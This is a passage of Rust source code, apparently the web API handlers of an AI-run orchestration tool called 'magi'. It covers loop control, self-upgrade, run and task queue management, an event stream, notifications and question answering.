1829 merge: Option<String>,
1832 last_error: Option<String>,
1840 daemon: DaemonView,
1843}
1844
1845#[derive(Debug, Clone, Copy)]
1854struct Foreign {
1855 pid: Option<u32>,
1857}
1858
1859impl Foreign {
1860 fn of(reading: Option<&daemon::Reading>) -> Option<Self> {
1863 let reading = reading?;
1864 if !reading.running(Timestamp::now()) {
1865 return None;
1866 }
1867 match reading.pid {
1868 Some(pid) if pid == std::process::id() => None,
1869 pid => Some(Self { pid }),
1873 }
1874 }
1875
1876 fn who(&self) -> String {
1879 match self.pid {
1880 Some(pid) => format!("another magi process (pid {pid})"),
1881 None => "another magi process".to_owned(),
1882 }
1883 }
1884}
1885
1886type Launch = fn(daemon::Opts, daemon::Stop) -> Pin<Box<dyn Future<Output = Result<()>> + Send>>;
1891
1892fn launch_daemon(
1894 opts: daemon::Opts,
1895 stop: daemon::Stop,
1896) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
1897 Box::pin(daemon::serve_until(opts, stop))
1898}
1899
1900#[derive(Debug, Default)]
1902struct LoopState {
1903 live: Option<Live>,
1905 rev: u64,
1913 last_error: Option<String>,
1916}
1917
1918#[derive(Debug)]
1920struct Live {
1921 stop: daemon::Stop,
1923 handle: tokio::task::JoinHandle<()>,
1928 opts: daemon::Opts,
1932}
1933
1934impl Live {
1935 fn alive(&self) -> bool {
1937 !self.handle.is_finished()
1938 }
1939}
1940
1941fn lock_or_recover(state: &Mutex<LoopState>) -> MutexGuard<'_, LoopState> {
1948 state.lock().unwrap_or_else(PoisonError::into_inner)
1949}
1950
1951async fn loop_get(State(ui): State<Arc<Ui>>) -> ApiResult<Json<LoopView>> {
1953 blocking(move || {
1954 let reading = daemon::read_status(&ui.home);
1955 Ok(Json(ui.loop_view(reading)))
1956 })
1957 .await
1958}
1959
1960#[derive(Debug, Deserialize)]
1966#[serde(deny_unknown_fields)]
1967struct LoopCommand {
1968 running: bool,
1969 #[serde(default)]
1979 park: bool,
1980}
1981
1982async fn loop_post(
1990 State(ui): State<Arc<Ui>>,
1991 body: std::result::Result<Json<LoopCommand>, JsonRejection>,
1992) -> ApiResult<Json<LoopView>> {
1993 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
1996 blocking(move || {
1997 let reading = daemon::read_status(&ui.home);
1998 let foreign = Foreign::of(reading.as_ref());
1999 if body.running {
2000 ui.start_loop(foreign)?;
2001 } else {
2002 ui.stop_loop(foreign, body.park)?;
2003 }
2004 Ok(Json(ui.loop_view(reading)))
2005 })
2006 .await
2007}
2008
2009#[derive(Debug, Serialize)]
2011struct UpgradeView {
2012 from: String,
2014 to: Option<String>,
2016 parked: Option<String>,
2018 detail: String,
2020}
2021
2022async fn upgrade_post(State(ui): State<Arc<Ui>>) -> ApiResult<(StatusCode, Json<UpgradeView>)> {
2046 let reading = daemon::read_status(&ui.home);
2047 if let Some(other) = Foreign::of(reading.as_ref()) {
2048 return Err(ApiError::conflict(format!(
2049 "the loop belongs to {}, so replacing this binary would leave \
2050 that process running an old one against the same queue. Upgrade \
2051 where it was started.",
2052 other.who()
2053 )));
2054 }
2055
2056 if crate::updater::disabled_by_env() {
2062 return Ok((
2063 StatusCode::OK,
2064 Json(UpgradeView {
2065 from: env!("CARGO_PKG_VERSION").to_owned(),
2066 to: None,
2067 parked: None,
2068 detail: format!(
2069 "Automatic updates are disabled by {}. Nothing was parked \
2070 and nothing restarted.",
2071 crate::updater::NO_AUTOUPDATE_ENV
2072 ),
2073 }),
2074 ));
2075 }
2076
2077 let (cfg, _) = Config::discover(&ui.repo, None).unwrap_or_default();
2082 let from = env!("CARGO_PKG_VERSION").to_owned();
2083 let latest = match crate::updater::Checker::new(&cfg.update) {
2084 Some(checker) => checker
2085 .newer_release()
2086 .await
2087 .map_err(|e| ApiError::internal(format!("check for a release: {e:#}")))?,
2088 None => None,
2089 };
2090 let Some(latest) = latest else {
2091 return Ok((
2092 StatusCode::OK,
2093 Json(UpgradeView {
2094 from,
2095 to: None,
2096 parked: None,
2097 detail: "Already on the newest release. Nothing was parked \
2098 and nothing restarted."
2099 .to_owned(),
2100 }),
2101 ));
2102 };
2103
2104 let parked = ui.park_for_upgrade()?;
2107 let detail = match &parked {
2108 Some(run) => format!(
2113 "Run {} is parking at its next step, which can take as long as \
2114 the step it is on - up to an hour for an implement wave. The \
2115 deck replaces itself once it parks, comes back, and the loop \
2116 carries that run on from where it stopped. Nothing is lost if \
2117 you close this.",
2118 crate::run::short_of(run)
2119 ),
2120 None => "The deck replaces itself and comes back. Nothing was in \
2121 flight to park."
2122 .to_owned(),
2123 };
2124
2125 let mut progress = updater::Progress::new(from.clone(), latest.tag_name.clone());
2129 progress.parked_run = parked.clone();
2130 let _ = updater::write_progress(&ui.home, &progress);
2131
2132 let home = ui.home.clone();
2133 tokio::spawn(async move {
2134 if let Err(e) = upgrade_and_restart(home.clone()).await {
2135 tracing::error!("the upgrade did not complete: {e:#}");
2136 if let Some(mut progress) = updater::read_progress(&home) {
2137 progress.fail(format!("{e:#}"));
2138 let _ = updater::write_progress(&home, &progress);
2139 }
2140 }
2141 });
2142
2143 Ok((
2144 StatusCode::ACCEPTED,
2145 Json(UpgradeView {
2146 from,
2147 to: Some(latest.tag_name),
2148 parked,
2149 detail,
2150 }),
2151 ))
2152}
2153
2154async fn upgrade_and_restart(home: PathBuf) -> Result<()> {
2159 crate::updater::run_self_update(true, false, true).await?;
2162 tracing::info!("binary replaced - asking the server to hand over");
2163 if let Some(mut progress) = updater::read_progress(&home) {
2164 progress.advance(updater::Stage::Replaced);
2165 let _ = updater::write_progress(&home, &progress);
2166 }
2167 HANDOVER.notify_one();
2168 Ok(())
2169}
2170
2171#[derive(Debug, Serialize)]
2177struct RunSummary {
2178 id: String,
2179 short: String,
2180 status: String,
2181 done: bool,
2182 instruction: String,
2183 title: String,
2184 repo: String,
2185 repo_name: String,
2186 created_at: String,
2187 updated_at: String,
2188 candidates: usize,
2189 viable: usize,
2190 judges: usize,
2191 winner: Option<char>,
2192 reviews: usize,
2193 quota_losses: usize,
2194 event: Option<String>,
2195 superseded_by: Option<String>,
2200 waiting: bool,
2207 live: crate::run::Liveness,
2211 pr: Option<crate::run::PrRecord>,
2213 unmerged_by_design: bool,
2219}
2220
2221impl RunSummary {
2222 fn of(state: &RunState, waiting: bool, live: crate::run::Liveness) -> Self {
2223 Self {
2224 id: state.id.clone(),
2225 short: state.short().to_owned(),
2226 status: status_word(state.status),
2227 done: state.status.done(),
2228 unmerged_by_design: state.unmerged_by_design(),
2229 instruction: state.instruction.clone(),
2230 title: title_from(&state.instruction, TITLE_MAX),
2231 repo: state.repo.display().to_string(),
2232 repo_name: state
2233 .repo
2234 .file_name()
2235 .map(|n| n.to_string_lossy().into_owned())
2236 .unwrap_or_default(),
2237 created_at: state.created_at.to_string(),
2238 updated_at: state.updated_at.to_string(),
2239 candidates: state.candidates.len(),
2240 viable: state.viable().len(),
2241 judges: state.config.graph.judges,
2242 winner: state.winner().map(|c| c.label),
2243 reviews: state.reviews.len(),
2244 quota_losses: state.quota.len(),
2245 event: state.events.last().map(|e| e.message.clone()),
2246 waiting,
2247 live,
2248 superseded_by: None,
2251 pr: state.pr.clone(),
2252 }
2253 }
2254}
2255
2256fn status_word(status: RunStatus) -> String {
2259 status.as_str().to_owned()
2263}
2264
2265#[derive(Debug, Deserialize)]
2267struct ListQuery {
2268 #[serde(default)]
2269 limit: Option<usize>,
2270}
2271
2272async fn runs_list(
2273 State(ui): State<Arc<Ui>>,
2274 Query(q): Query<ListQuery>,
2275) -> ApiResult<Json<Vec<RunSummary>>> {
2276 let limit = q.limit.unwrap_or(LIST_DEFAULT).min(LIST_MAX);
2277 blocking(move || {
2278 let superseded = superseded_runs(&ui.queue);
2279 let open_runs: HashSet<String> = ui
2283 .questions
2284 .list()
2285 .into_iter()
2286 .filter(|q| q.status.open())
2287 .map(|q| q.run)
2288 .collect();
2289 let claimed: HashSet<String> =
2290 crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2291 .into_iter()
2292 .map(|c| c.run)
2293 .collect();
2294 let states = run_ids(&ui.runs)
2295 .into_iter()
2296 .filter_map(|id| read_run(&ui.runs, &id).ok())
2301 .take(limit);
2302 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::real());
2303 let summaries = summarize(
2304 states,
2305 &open_runs,
2306 &claimed,
2307 &superseded,
2308 |p| probe.borrow_mut().status(p),
2309 |p| probe.borrow_mut().started_at(p),
2310 );
2311 Ok(Json(summaries))
2312 })
2313 .await
2314}
2315
2316fn summarize<I, S, D>(
2322 states: I,
2323 open_runs: &HashSet<String>,
2324 claimed: &HashSet<String>,
2325 superseded: &HashMap<String, String>,
2326 mut status_q: S,
2327 mut identity_q: D,
2328) -> Vec<RunSummary>
2329where
2330 I: IntoIterator<Item = RunState>,
2331 S: FnMut(u32) -> Option<bool>,
2332 D: FnMut(u32) -> Option<String>,
2333{
2334 states
2335 .into_iter()
2336 .map(|state| {
2337 let waiting = open_runs.contains(&state.id);
2338 let live =
2339 state.liveness_with(claimed.contains(&state.id), &mut status_q, &mut identity_q);
2340 let mut row = RunSummary::of(&state, waiting, live);
2341 row.superseded_by = superseded
2342 .get(&state.id)
2343 .map(String::as_str)
2344 .map(crate::run::short_of)
2345 .map(str::to_owned);
2346 row
2347 })
2348 .collect()
2349}
2350
2351fn superseded_runs(queue: &Queue) -> HashMap<String, String> {
2364 let mut by = HashMap::new();
2365 for task in queue.list() {
2366 for pair in task.runs.windows(2) {
2367 if let [earlier, later] = pair {
2368 by.insert(earlier.clone(), later.clone());
2369 }
2370 }
2371 }
2372 by
2373}
2374
2375#[derive(Debug, Serialize)]
2382struct RunDetailView {
2383 #[serde(flatten)]
2384 state: RunState,
2385 instruction_md: Vec<md::Node>,
2386 live: crate::run::Liveness,
2401 unmerged_by_design: bool,
2406}
2407
2408impl RunDetailView {
2409 fn of(state: RunState, live: crate::run::Liveness) -> Self {
2410 Self {
2411 instruction_md: md::to_nodes(&state.instruction, &md::ImageBase::None),
2412 live,
2413 unmerged_by_design: state.unmerged_by_design(),
2414 state,
2415 }
2416 }
2417}
2418
2419async fn run_detail(
2420 State(ui): State<Arc<Ui>>,
2421 Path(id): Path<String>,
2422) -> ApiResult<Json<RunDetailView>> {
2423 blocking(move || {
2424 let id = resolve_run(&ui.runs, &id)?;
2425 let state = read_run(&ui.runs, &id)?;
2426 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2427 let live = state.liveness(daemon_claims);
2428 Ok(Json(RunDetailView::of(state, live)))
2429 })
2430 .await
2431}
2432
2433async fn run_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
2442 let (id, unreadable) = {
2443 let ui = Arc::clone(&ui);
2444 blocking(move || {
2445 let id = resolve_run(&ui.runs, &id)?;
2446 match read_run(&ui.runs, &id) {
2447 Ok(state) => {
2448 let in_flight =
2449 crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2450 state
2451 .ensure_can_delete(in_flight)
2452 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
2453 let dir = ui.runs.join(&id);
2454 std::fs::remove_dir_all(&dir)
2455 .with_context(|| format!("remove run directory {}", dir.display()))?;
2456 Ok((id, false))
2457 }
2458 Err(_) => {
2459 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2463 return Err(ApiError::conflict(format!(
2464 "run {id} is being worked on by a live daemon right now"
2465 )));
2466 }
2467 Ok((id, true))
2468 }
2469 }
2470 })
2471 .await?
2472 };
2473 if unreadable {
2474 crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2475 .await
2476 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2477 }
2478 let ui = Arc::clone(&ui);
2479 let done = id.clone();
2480 blocking(move || {
2481 ui.questions.abandon_for_run(
2484 &done,
2485 &format!("run {done} was deleted, so nothing is waiting for this answer"),
2486 )?;
2487 Ok(())
2488 })
2489 .await?;
2490 Ok(StatusCode::NO_CONTENT)
2491}
2492
2493async fn run_fold(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Json<FoldView>> {
2517 let (id, state) = {
2518 let ui = Arc::clone(&ui);
2519 blocking(move || {
2520 let id = resolve_run(&ui.runs, &id)?;
2521 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2522 return Err(ApiError::conflict(format!(
2523 "run {id} is being worked on by a live daemon right now"
2524 )));
2525 }
2526 let state = read_run(&ui.runs, &id).ok();
2527 Ok((id, state))
2528 })
2529 .await?
2530 };
2531 let removed = match state {
2532 Some(mut state) => {
2533 let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2534 .await
2535 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2536 if removed.is_empty() {
2541 crate::clean::clear_abandoned_active(&mut state, &ui.home, jiff::Timestamp::now())
2542 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2543 }
2544 removed
2545 }
2546 None => crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2547 .await
2548 .map_err(|e| ApiError::internal(format!("{e:#}")))?,
2549 };
2550 Ok(Json(FoldView {
2551 run: id,
2552 removed_count: removed.len(),
2553 removed,
2554 }))
2555}
2556
2557#[derive(Debug, Serialize)]
2559struct FoldView {
2560 run: String,
2561 removed: Vec<String>,
2563 removed_count: usize,
2564}
2565
2566#[derive(Debug, Deserialize)]
2569struct FoldMergedBody {
2570 #[serde(default)]
2571 pr_url: String,
2572}
2573
2574async fn run_fold_merged(
2594 State(ui): State<Arc<Ui>>,
2595 Path(id): Path<String>,
2596 Json(body): Json<FoldMergedBody>,
2597) -> ApiResult<Json<FoldMergedView>> {
2598 let pr_url = body.pr_url.trim().to_owned();
2599 if pr_url.is_empty() {
2600 return Err(ApiError::bad_request("pr_url is required"));
2601 }
2602 let (id, mut state) = {
2603 let ui = Arc::clone(&ui);
2604 blocking(move || {
2605 let id = resolve_run(&ui.runs, &id)?;
2606 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2607 return Err(ApiError::conflict(format!(
2608 "run {id} is being worked on by a live daemon right now"
2609 )));
2610 }
2611 let state = read_run(&ui.runs, &id)?;
2612 Ok((id, state))
2613 })
2614 .await?
2615 };
2616 let (before, after) = crate::land::correct_manual_merge(&mut state, &pr_url)
2617 .await
2618 .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
2619 let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2620 .await
2621 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2622 Ok(Json(FoldMergedView {
2623 run: id,
2624 before: before.as_str().to_owned(),
2625 after: after.as_str().to_owned(),
2626 removed,
2627 }))
2628}
2629
2630#[derive(Debug, Serialize)]
2632struct FoldMergedView {
2633 run: String,
2634 before: String,
2636 after: String,
2638 removed: Vec<String>,
2640}
2641
2642async fn run_resume(
2662 State(ui): State<Arc<Ui>>,
2663 Path(id): Path<String>,
2664) -> ApiResult<(StatusCode, Json<RunSummary>)> {
2665 let (id, state) = {
2666 let ui = Arc::clone(&ui);
2667 blocking(move || {
2668 let id = resolve_run(&ui.runs, &id)?;
2669 let state = read_run(&ui.runs, &id)?;
2670 Ok((id, state))
2671 })
2672 .await?
2673 };
2674 if !state.status.resumable() {
2675 return Err(ApiError::conflict(format!(
2676 "run {} is `{}`, and only a stalled or blocked run can be resumed",
2677 state.short(),
2678 status_word(state.status)
2679 )));
2680 }
2681 if let Some(work) = crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2686 .into_iter()
2687 .next()
2688 {
2689 return Err(ApiError::conflict(format!(
2690 "the loop is running run {} right now; stop it first, or wait for \
2691 it to finish, before resuming a run by hand.",
2692 crate::run::short_of(&work.run)
2693 )));
2694 }
2695 let _resume = ui.begin_resume(&id)?;
2696
2697 let queued = RunSummary::of(
2700 &state,
2701 !ui.questions.open_for(&id).is_empty(),
2702 state.liveness(false),
2703 );
2704 let run = id.clone();
2705 tokio::spawn(async move {
2706 let _resume = _resume;
2707 match crate::graph::Runner::resume(&run) {
2708 Ok(mut runner) => {
2709 if let Err(e) = runner.execute().await {
2710 tracing::warn!("resume of run {run} stopped: {e:#}");
2711 }
2712 }
2713 Err(e) => tracing::warn!("run {run} could not be resumed: {e:#}"),
2716 }
2717 });
2718 Ok((StatusCode::ACCEPTED, Json(queued)))
2719}
2720
2721async fn run_report(
2722 State(ui): State<Arc<Ui>>,
2723 Path(id): Path<String>,
2724) -> ApiResult<impl IntoResponse> {
2725 let text = blocking(move || {
2726 let id = resolve_run(&ui.runs, &id)?;
2727 let state = read_run(&ui.runs, &id)?;
2731 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2732 let live = state.liveness(daemon_claims);
2733 Ok(format!(
2734 "{}{}",
2735 report::run(&state),
2736 report::active_seats(&state, live)
2737 ))
2738 })
2739 .await?;
2740 Ok(([(header::CONTENT_TYPE, "text/plain; charset=utf-8")], text))
2741}
2742
2743#[derive(Debug, Serialize)]
2749struct TaskView {
2750 #[serde(flatten)]
2751 task: Task,
2752 source_label: String,
2753 status_str: &'static str,
2754 instruction_md: Vec<md::Node>,
2758 waits_on: Vec<String>,
2762 stuck_roots: Vec<String>,
2765}
2766
2767impl From<Task> for TaskView {
2768 fn from(task: Task) -> Self {
2769 Self {
2770 source_label: task.source.label(),
2771 status_str: task.status.as_str(),
2772 instruction_md: md::to_nodes(&task.instruction, &md::ImageBase::None),
2773 waits_on: Vec::new(),
2774 stuck_roots: Vec::new(),
2775 task,
2776 }
2777 }
2778}
2779
2780impl TaskView {
2781 fn with_inventory(task: Task, inv: &crate::blockers::Inventory) -> Self {
2782 let waits_on = inv.waits_on(&task);
2783 let stuck_roots = inv
2784 .stuck_roots(&task)
2785 .iter()
2786 .map(|r| r.rsplit('-').next().unwrap_or(r).to_owned())
2787 .collect();
2788 Self {
2789 waits_on,
2790 stuck_roots,
2791 ..Self::from(task)
2792 }
2793 }
2794}
2795
2796#[derive(Debug, Default, Deserialize)]
2799#[serde(default)]
2800struct ReposQuery {
2801 refresh: u8,
2802}
2803
2804async fn repos_list(
2811 State(ui): State<Arc<Ui>>,
2812 Query(q): Query<ReposQuery>,
2813) -> ApiResult<Json<Vec<repos::Repo>>> {
2814 let refresh = q.refresh != 0;
2815 blocking(move || {
2816 let (cfg, _) = Config::discover(&ui.repo, None)?;
2817 Ok(Json(ui.repos_cache.list(
2818 &cfg.repos.roots,
2819 Duration::from_secs(cfg.repos.scan_ttl),
2820 refresh,
2821 )))
2822 })
2823 .await
2824}
2825
2826async fn queue_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TaskView>>> {
2827 blocking(move || {
2828 let tasks = ui.queue.list();
2829 let inv = crate::blockers::Inventory::new(tasks.clone(), &ui.questions.list());
2830 Ok(Json(
2831 tasks
2832 .into_iter()
2833 .map(|t| TaskView::with_inventory(t, &inv))
2834 .collect(),
2835 ))
2836 })
2837 .await
2838}
2839
2840#[derive(Debug, Default, Deserialize)]
2843#[serde(default, deny_unknown_fields)]
2844struct HoldBody {
2845 reason: Option<String>,
2846}
2847
2848async fn queue_hold(
2849 State(ui): State<Arc<Ui>>,
2850 Path(id): Path<String>,
2851 body: std::result::Result<Json<HoldBody>, JsonRejection>,
2852) -> ApiResult<Json<TaskView>> {
2853 let body = match body {
2857 Ok(Json(body)) => body,
2858 Err(JsonRejection::MissingJsonContentType(_)) => HoldBody::default(),
2859 Err(e) => return Err(ApiError::bad_request(e.body_text())),
2860 };
2861 let reason = body.reason.filter(|r| !r.trim().is_empty());
2862 mutate(ui, id, move |t| {
2863 t.hold_manual(reason.clone());
2864 Ok(())
2865 })
2866 .await
2867}
2868
2869async fn queue_release(
2870 State(ui): State<Arc<Ui>>,
2871 Path(id): Path<String>,
2872) -> ApiResult<Json<TaskView>> {
2873 mutate(ui, id, |t| {
2874 t.release();
2875 Ok(())
2876 })
2877 .await
2878}
2879
2880#[derive(Debug, Deserialize)]
2882#[serde(deny_unknown_fields)]
2883struct PriorityBody {
2884 priority: i32,
2885}
2886
2887async fn queue_priority(
2893 State(ui): State<Arc<Ui>>,
2894 Path(id): Path<String>,
2895 body: std::result::Result<Json<PriorityBody>, JsonRejection>,
2896) -> ApiResult<Json<TaskView>> {
2897 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
2898 mutate(ui, id, move |t| t.set_priority(body.priority)).await
2899}
2900
2901#[derive(Debug, Deserialize)]
2903#[serde(deny_unknown_fields)]
2904struct EditBody {
2905 title: String,
2906 instruction: String,
2907}
2908
2909async fn queue_edit(
2913 State(ui): State<Arc<Ui>>,
2914 Path(id): Path<String>,
2915 body: std::result::Result<Json<EditBody>, JsonRejection>,
2916) -> ApiResult<Json<TaskView>> {
2917 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
2918 mutate(ui, id, move |t| {
2919 t.edit(body.title.clone(), body.instruction.clone())
2920 })
2921 .await
2922}
2923
2924async fn queue_done(
2932 State(ui): State<Arc<Ui>>,
2933 Path(id): Path<String>,
2934) -> ApiResult<Json<TaskView>> {
2935 mutate(ui, id, |t| {
2936 t.succeed();
2937 Ok(())
2938 })
2939 .await
2940}
2941
2942async fn queue_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
2950 blocking(move || {
2951 let id = resolve_task(&ui.queue, &id)?;
2952 let in_flight = crate::daemon::is_working_on_task(&ui.home, &id, jiff::Timestamp::now());
2953 ui.queue
2954 .remove(&id, in_flight, &ui.questions)
2955 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
2956 Ok(StatusCode::NO_CONTENT)
2957 })
2958 .await
2959}
2960
2961async fn mutate(
2970 ui: Arc<Ui>,
2971 id: String,
2972 change: impl FnOnce(&mut Task) -> Result<()> + Send + 'static,
2973) -> ApiResult<Json<TaskView>> {
2974 blocking(move || {
2975 let id = resolve_task(&ui.queue, &id)?;
2976 let _claim = ui.queue.claim(&id).map_err(|e| {
2981 ApiError::conflict(format!(
2982 "{e:#} - a daemon is running this task, so it cannot be \
2983 changed from here yet"
2984 ))
2985 })?;
2986 let mut task = ui.queue.get(&id)?;
2987 change(&mut task).map_err(ApiError::bad_request_from)?;
2988 ui.queue.put(&mut task)?;
2989 Ok(Json(TaskView::from(task)))
2990 })
2991 .await
2992}
2993
2994async fn events(State(ui): State<Arc<Ui>>) -> impl IntoResponse {
3002 let (tx, rx) = tokio::sync::mpsc::channel::<Event>(4);
3003 tokio::spawn(async move {
3004 let mut ticker = tokio::time::interval(POLL);
3005 let mut last: Option<(u64, u64, u64, u64, u64, u64)> = None;
3006 loop {
3007 ticker.tick().await;
3010 let state = Arc::clone(&ui);
3011 let revisions = tokio::task::spawn_blocking(move || {
3012 (
3013 state.queue.revision(),
3014 runs_revision(&state.runs),
3015 state.questions.revision(),
3016 state.talks.revision(),
3017 state.notices.revision(),
3018 state.lock_loop().rev,
3022 )
3023 })
3024 .await;
3025 let Ok(revisions) = revisions else { break };
3026 if last == Some(revisions) {
3027 continue;
3028 }
3029 last = Some(revisions);
3030 let payload = serde_json::json!({
3031 "queue_rev": revisions.0,
3032 "runs_rev": revisions.1,
3033 "questions_rev": revisions.2,
3034 "talks_rev": revisions.3,
3035 "notifications_rev": revisions.4,
3036 "loop_rev": revisions.5,
3037 });
3038 let Ok(event) = Event::default().event("change").json_data(payload) else {
3040 break;
3041 };
3042 if tx.send(event).await.is_err() {
3043 break;
3044 }
3045 }
3046 });
3047 Sse::new(ReceiverStream::new(rx).map(Ok::<Event, Infallible>))
3048 .keep_alive(KeepAlive::new().interval(KEEPALIVE))
3049}
3050
3051fn runs_revision(runs: &FsPath) -> u64 {
3058 use std::hash::{Hash as _, Hasher as _};
3059
3060 let mut entries: Vec<(String, u64)> = std::fs::read_dir(runs)
3061 .into_iter()
3062 .flatten()
3063 .flatten()
3064 .filter_map(|e| {
3065 let path = e.path().join("run.json");
3066 let mtime = path
3067 .metadata()
3068 .ok()?
3069 .modified()
3070 .ok()?
3071 .duration_since(std::time::UNIX_EPOCH)
3072 .ok()?
3073 .as_millis() as u64;
3074 let id = e.file_name().to_string_lossy().into_owned();
3075 Some((id, mtime))
3076 })
3077 .collect();
3078
3079 if entries.is_empty() {
3080 return 0;
3081 }
3082
3083 entries.sort_unstable();
3084 let mut hasher = std::hash::DefaultHasher::new();
3085 for (id, mtime) in &entries {
3086 id.hash(&mut hasher);
3087 mtime.hash(&mut hasher);
3088 }
3089 let h = hasher.finish();
3090 if h == 0 { 1 } else { h }
3091}
3092
3093fn run_ids(runs: &FsPath) -> Vec<String> {
3099 let mut ids: Vec<String> = std::fs::read_dir(runs)
3100 .into_iter()
3101 .flatten()
3102 .flatten()
3103 .filter(|e| e.path().join("run.json").is_file())
3104 .map(|e| e.file_name().to_string_lossy().into_owned())
3105 .collect();
3106 ids.sort_unstable_by(|a, b| b.cmp(a));
3108 ids
3109}
3110
3111fn read_run(runs: &FsPath, id: &str) -> Result<RunState> {
3113 let path = runs.join(id).join("run.json");
3114 let body =
3115 std::fs::read_to_string(&path).with_context(|| format!("read {}", path.display()))?;
3116 let state: RunState =
3117 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
3118 if state.schema != run::SCHEMA {
3119 anyhow::bail!(
3120 "run {} was written by a different magi (schema {}, this build speaks {})",
3121 state.id,
3122 state.schema,
3123 run::SCHEMA
3124 );
3125 }
3126 Ok(state)
3127}
3128
3129#[must_use]
3137pub fn runs_unreadable(runs: &FsPath) -> usize {
3138 run_ids(runs)
3139 .into_iter()
3140 .filter(|id| read_run(runs, id).is_err())
3141 .count()
3142}
3143
3144fn resolve_run(runs: &FsPath, id: &str) -> ApiResult<String> {
3146 if runs.join(id).join("run.json").is_file() {
3147 return Ok(id.to_owned());
3148 }
3149 pick(run_ids(runs), id, "run")
3150}
3151
3152fn resolve_task(queue: &Queue, id: &str) -> ApiResult<String> {
3154 if queue.path_of(id).is_file() {
3155 return Ok(id.to_owned());
3156 }
3157 pick(queue.list().into_iter().map(|t| t.id).collect(), id, "task")
3158}
3159
3160#[derive(Debug, Serialize)]
3171struct QuestionView {
3172 #[serde(flatten)]
3173 question: Question,
3174 detail_md: Vec<md::Node>,
3175 waiting_on_agent: bool,
3185}
3186
3187impl From<Question> for QuestionView {
3188 fn from(question: Question) -> Self {
3189 let base = md::ImageBase::QuestionPanel {
3190 id: question.id.clone(),
3191 };
3192 Self {
3193 detail_md: md::to_nodes(&question.detail, &base),
3194 waiting_on_agent: question.waiting_on_agent(),
3195 question,
3196 }
3197 }
3198}
3199
3200async fn questions_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<QuestionView>>> {
3206 blocking(move || {
3207 Ok(Json(
3208 ui.questions
3209 .list()
3210 .into_iter()
3211 .map(QuestionView::from)
3212 .collect(),
3213 ))
3214 })
3215 .await
3216}
3217
3218async fn notifications_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3221 blocking(move || {
3222 let items = ui.notices.list();
3223 let unread = items.iter().filter(|n| n.unread()).count();
3224 Ok(Json(
3225 serde_json::json!({ "unread": unread, "items": items }),
3226 ))
3227 })
3228 .await
3229}
3230
3231fn notice_error(e: anyhow::Error) -> ApiError {
3232 ApiError::not_found(format!("{e:#}"))
3235}
3236
3237async fn notification_read(
3239 State(ui): State<Arc<Ui>>,
3240 Path(id): Path<String>,
3241) -> ApiResult<Json<Notice>> {
3242 blocking(move || ui.notices.mark_read(&id).map(Json).map_err(notice_error)).await
3243}
3244
3245async fn notification_dismiss(
3247 State(ui): State<Arc<Ui>>,
3248 Path(id): Path<String>,
3249) -> ApiResult<Json<Notice>> {
3250 blocking(move || ui.notices.dismiss(&id).map(Json).map_err(notice_error)).await
3251}
3252
3253async fn notifications_read_all(State(ui): State<Arc<Ui>>) -> ApiResult<Json<serde_json::Value>> {
3255 blocking(move || {
3256 let changed = ui.notices.mark_all_read()?;
3257 Ok(Json(serde_json::json!({ "marked": changed })))
3258 })
3259 .await
3260}
3261
3262#[derive(Debug, Default, Deserialize)]
3268#[serde(default, deny_unknown_fields)]
3269struct NewAnswer {
3270 choice: Option<String>,
3271 text: Option<String>,
3272}
3273
3274async fn question_answer(
3275 State(ui): State<Arc<Ui>>,
3276 Path(id): Path<String>,
3277 body: std::result::Result<Json<NewAnswer>, axum::extract::rejection::JsonRejection>,
3278) -> ApiResult<Json<QuestionView>> {
3279 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3280 let answer = match (body.choice, body.text) {
3281 (Some(c), None) => Answer::Choice(c),
3282 (None, Some(t)) => Answer::Text(t),
3283 (Some(_), Some(_)) => {
3284 return Err(ApiError::bad_request(
3285 "send either `choice` or `text`, not both",
3286 ));
3287 }
3288 (None, None) => {
3289 return Err(ApiError::bad_request("send a `choice` or a `text`"));
3290 }
3291 };
3292
3293 blocking(move || {
3294 let id = resolve_question(&ui.questions, &id)?;
3295 let mut q = ui
3296 .questions
3297 .get(&id)
3298 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3299 if !q.status.open() {
3300 return Err(ApiError::conflict(format!(
3304 "question {} is already {}",
3305 q.short(),
3306 q.status.as_str()
3307 )));
3308 }
3309 q.answer(answer).map_err(ApiError::bad_request_from)?;
3313 ui.questions.put(&mut q)?;
3314 Ok(Json(QuestionView::from(q)))
3315 })
3316 .await
3317}
3318
3319#[derive(Debug, Deserialize)]
3321#[serde(deny_unknown_fields)]
3322struct NewSay {
3323 body: String,
3324}
3325
3326async fn question_say(
